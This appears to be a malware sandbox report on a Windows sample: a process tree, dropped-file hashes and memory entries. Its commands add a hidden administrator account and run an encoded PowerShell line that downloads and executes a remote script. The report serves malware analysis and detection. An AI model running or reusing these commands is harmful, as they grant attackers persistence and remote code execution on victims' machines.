C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 27WEG86E1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 27WEG86E2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 27WEG86E3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.dllMD5
6b45c158c0142e7fe26e9517bc853a31
SHA1e84441f6a39c7688b165efea73b14c7320fff13c
SHA2568298870da40cba6b86f30c392404ce3404c32c36da37ebe3e808ba642bd2dc8c
SHA512882c2e1a54595041aa432d20be1cfd1d709e4c2ce10da22d9d535f21bba2348bdba3aba9fc2bfa523279d3c5ac1d2c7a07840ac0765682c6e83b051e1ddb4a03
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
b2207567c6a62b42655772770ce2a4e6
SHA151074ad655105f0c496f4017e8afee90d9cab900
SHA256d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab
SHA51285d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5
-
C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmpMD5
4546e1b20ae249b3b97789431845df7d
SHA181322443c226336c15f848a70f1df1ad0ce36bb7
SHA256679f66b63e7edcaddc00c7fc1289f2daa103b60652ea90ba0fa6191f3af40017
SHA512a55cea99aa0eab5f443a79737c7714df821e76e124648c022275f94bd179d757176cdd7b7c09be08d31fab18d46bd01217d1f28575c1cf25b11a4f4387f753b5
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exeMD5
aa80d5960e65ac46ad446c09c1a17608
SHA1c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA51207e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdlineMD5
0e81c1db6e6d18e3eb0a90640a848561
SHA10a1f8fd66cf98523b54e82aba40628893aed243e
SHA256c95467ba12392c4878f251b40d1296754bcee72c7193929a1cc3aca1f9b1c64c
SHA512f2f0bc3f8235ab8d1727e96526f973e367fe664c45b565c421e1419bab82c8781a013ea095f8c760de284dc27e5a9331c8740a1fe575a155eb81d6318e089f29
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMPMD5
243aa15a7018198b56d08105b12f765b
SHA1eae0e27cd3844b8502f5133367a134d6c1c46368
SHA256e05187476e3cf9806ea918fed9595a229ee0d03f5472fc3c8d3f3a8cab33a95e
SHA5124ceb831ec76876a8a1adb5cc0887278f7ba018869755852e364b2246376340ea57302bf550894b9d12b7289d8ec710a0b3cc6b1d652f5166c7f3f8f314612053
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
1da8e368cb917044f7440a54d79f6737
SHA1df60dd7011bc948f3b871b1a6cb149a7028c1a85
SHA256dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4
SHA5128437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92
-
\Windows\Branding\mediasvc.pngMD5
009e8b6a916836a4a8aa2be3229276a1
SHA128f3892fb8b63e7299dce25cb65bf252e29d5afd
SHA25639ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7
SHA512a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc
-
memory/212-250-0x0000000000000000-mapping.dmp
-
memory/212-231-0x0000000000000000-mapping.dmp
-
memory/996-151-0x0000000000000000-mapping.dmp
-
memory/1244-217-0x0000000000000000-mapping.dmp
-
memory/1244-219-0x0000020A7F730000-0x0000020A7F732000-memory.dmpFilesize
8KB
-
memory/1244-221-0x0000020A7F736000-0x0000020A7F738000-memory.dmpFilesize
8KB
-
memory/1244-220-0x0000020A7F733000-0x0000020A7F735000-memory.dmpFilesize
8KB
-
memory/1244-222-0x0000020A7F738000-0x0000020A7F73A000-memory.dmpFilesize
8KB
-
memory/1284-155-0x0000000000000000-mapping.dmp
-
memory/1324-243-0x0000000000000000-mapping.dmp
-
memory/1384-213-0x00000203331C8000-0x00000203331CA000-memory.dmpFilesize
8KB
-
memory/1384-203-0x00000203331C6000-0x00000203331C8000-memory.dmpFilesize
8KB
-
memory/1384-181-0x00000203331C3000-0x00000203331C5000-memory.dmpFilesize
8KB
-
memory/1384-180-0x00000203331C0000-0x00000203331C2000-memory.dmpFilesize
8KB
-
memory/1384-173-0x0000000000000000-mapping.dmp
-
memory/1524-262-0x0000000000000000-mapping.dmp
-
memory/1528-225-0x0000000000000000-mapping.dmp
-
memory/1612-228-0x0000000000000000-mapping.dmp
-
memory/1720-126-0x00000241EF9E0000-0x00000241EFE01000-memory.dmpFilesize
4.1MB
-
memory/1720-131-0x00000241EF5A5000-0x00000241EF5A6000-memory.dmpFilesize
4KB
-
memory/1720-130-0x00000241EF5A3000-0x00000241EF5A5000-memory.dmpFilesize
8KB
-
memory/1720-129-0x00000241EF5A0000-0x00000241EF5A2000-memory.dmpFilesize
8KB
-
memory/1720-122-0x0000000000000000-mapping.dmp
-
memory/1720-132-0x00000241EF5A6000-0x00000241EF5A7000-memory.dmpFilesize
4KB
-
memory/1908-245-0x0000000000000000-mapping.dmp
-
memory/1928-230-0x0000000000000000-mapping.dmp
-
memory/2124-258-0x000002C979378000-0x000002C979379000-memory.dmpFilesize
4KB
-
memory/2124-242-0x0000000000000000-mapping.dmp
-
memory/2124-254-0x0000000000000000-mapping.dmp
-
memory/2124-257-0x000002C979376000-0x000002C979378000-memory.dmpFilesize
8KB
-
memory/2124-256-0x000002C979373000-0x000002C979375000-memory.dmpFilesize
8KB
-
memory/2124-255-0x000002C979370000-0x000002C979372000-memory.dmpFilesize
8KB
-
memory/2220-260-0x0000000000000000-mapping.dmp
-
memory/2240-248-0x0000000000000000-mapping.dmp
-
memory/2480-239-0x0000000000000000-mapping.dmp
-
memory/2496-127-0x0000000000000000-mapping.dmp
-
memory/2496-251-0x0000000000000000-mapping.dmp
-
memory/2648-241-0x0000000000000000-mapping.dmp
-
memory/2660-261-0x0000000000000000-mapping.dmp
-
memory/2688-141-0x0000024E712F3000-0x0000024E712F5000-memory.dmpFilesize
8KB
-
memory/2688-223-0x0000024E712F8000-0x0000024E712F9000-memory.dmpFilesize
4KB
-
memory/2688-159-0x0000024E71240000-0x0000024E71241000-memory.dmpFilesize
4KB
-
memory/2688-166-0x0000024E72CC0000-0x0000024E72CC1000-memory.dmpFilesize
4KB
-
memory/2688-154-0x0000024E712F6000-0x0000024E712F8000-memory.dmpFilesize
8KB
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/2688-165-0x0000024E72930000-0x0000024E72931000-memory.dmpFilesize
4KB
-
memory/2688-143-0x0000024E71580000-0x0000024E71581000-memory.dmpFilesize
4KB
-
memory/2688-139-0x0000024E712F0000-0x0000024E712F2000-memory.dmpFilesize
8KB
-
memory/2688-138-0x0000024E71250000-0x0000024E71251000-memory.dmpFilesize
4KB
-
memory/2772-244-0x0000000000000000-mapping.dmp
-
memory/2776-235-0x0000000000000000-mapping.dmp
-
memory/2884-246-0x0000000000000000-mapping.dmp
-
memory/2988-114-0x0000000002230000-0x00000000022C1000-memory.dmpFilesize
580KB
-
memory/2988-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/3000-259-0x0000000000000000-mapping.dmp
-
memory/3028-229-0x0000000000000000-mapping.dmp
-
memory/3112-240-0x0000000000000000-mapping.dmp
-
memory/3112-226-0x0000000000000000-mapping.dmp
-
memory/3120-232-0x0000000000000000-mapping.dmp
-
memory/3324-236-0x0000000000000000-mapping.dmp
-
memory/3460-224-0x0000000000000000-mapping.dmp
-
memory/3580-253-0x0000000000000000-mapping.dmp
-
memory/3580-125-0x0000000000000000-mapping.dmp
-
memory/3648-249-0x0000000000000000-mapping.dmp
-
memory/3676-233-0x0000000000000000-mapping.dmp
-
memory/3752-247-0x0000000000000000-mapping.dmp
-
memory/3808-212-0x0000000000000000-mapping.dmp
-
memory/3808-214-0x000001C368290000-0x000001C368292000-memory.dmpFilesize
8KB
-
memory/3808-216-0x000001C368296000-0x000001C368298000-memory.dmpFilesize
8KB
-
memory/3808-215-0x000001C368293000-0x000001C368295000-memory.dmpFilesize
8KB
-
memory/3808-218-0x000001C368298000-0x000001C36829A000-memory.dmpFilesize
8KB
-
memory/3936-234-0x0000000000000000-mapping.dmp
-
memory/3948-227-0x0000000000000000-mapping.dmp
-
memory/3952-252-0x0000000000000000-mapping.dmp